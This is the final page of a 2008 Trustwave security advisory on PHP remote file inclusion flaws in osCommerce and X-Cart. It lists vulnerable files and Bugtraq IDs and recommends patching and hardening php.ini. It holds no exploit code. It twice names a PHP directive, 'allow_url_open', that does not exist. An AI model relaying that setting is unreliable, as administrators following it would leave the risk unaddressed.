  • 5. Remote file inclusion vulnerabilities in both the osCommerce and X‐Cart applications have been publicly  disclosed:    Remote file inclusion vulnerabilities  Application Vulnerable File Disclosure Date Reference osCommerce Online Merchant v2.1 include_once.php 06/16/2002 Bugtraq ID: 5037 Qualiteam X-Cart 4.x cmpi.php 09/08/2006 Bugtraq ID: 20108 Qualiteam X-Cart 3.5.0 config.php 09/11/2007 Bugtraq ID: 25637 prepare.php smarty.php product.php auth.php   Although the vendors listed above have released updates to patch the vulnerabilities, the root problem  lies on the application user’s side with the configuration of the PHP programming language on their  server.     E‐commerce merchants can easily avoid PHP remote file‐inclusion exploits by properly configuring the  PHP programming language installed on their server. The majority of PHP remote file‐inclusion exploits  are possible because of two configuration directives included within PHP; register_globals and  allow_url_open. When enabled, either of these directives may allow the inclusion of files from a remote site  for local execution.    An administrator can easily disable the register_globals and allow_url_open directives in the php.ini  configuration file. In PHP versions 4.2.0 or later, register_globals is disabled by default. In PHP 6.0, the  register_globals directive has been removed altogether.    In conclusion, to protect against PHP remote file‐inclusion exploits, Trustwave recommends that e‐ commerce merchants perform stringent code reviews to ensure that their e‐commerce applications are  properly patched and securely configured. At the very least, this process should include disabling the  register_globals and allow_url_open PHP directives in the php.ini configuration file.          About Trustwave   Trustwave is a global provider of information security and compliance management solutions to businesses and the  public sector. The company has serviced more than 30,000 organizations throughout the world including banks,  merchants, service providers and software developers that are required to validate compliance with industry best  practices for safeguarding information endorsed by American Express, Discover, MasterCard Worldwide, Visa  International and Visa USA. Trustwave is a leading certificate authority with thousands of secure sockets layer  (SSL) certificates issued. Trustwave is headquartered in Chicago with offices throughout North America, South  America, Europe, the Middle East, Africa, Asia and Australia.  Copyright 2008, Trustwave Page 5 of 5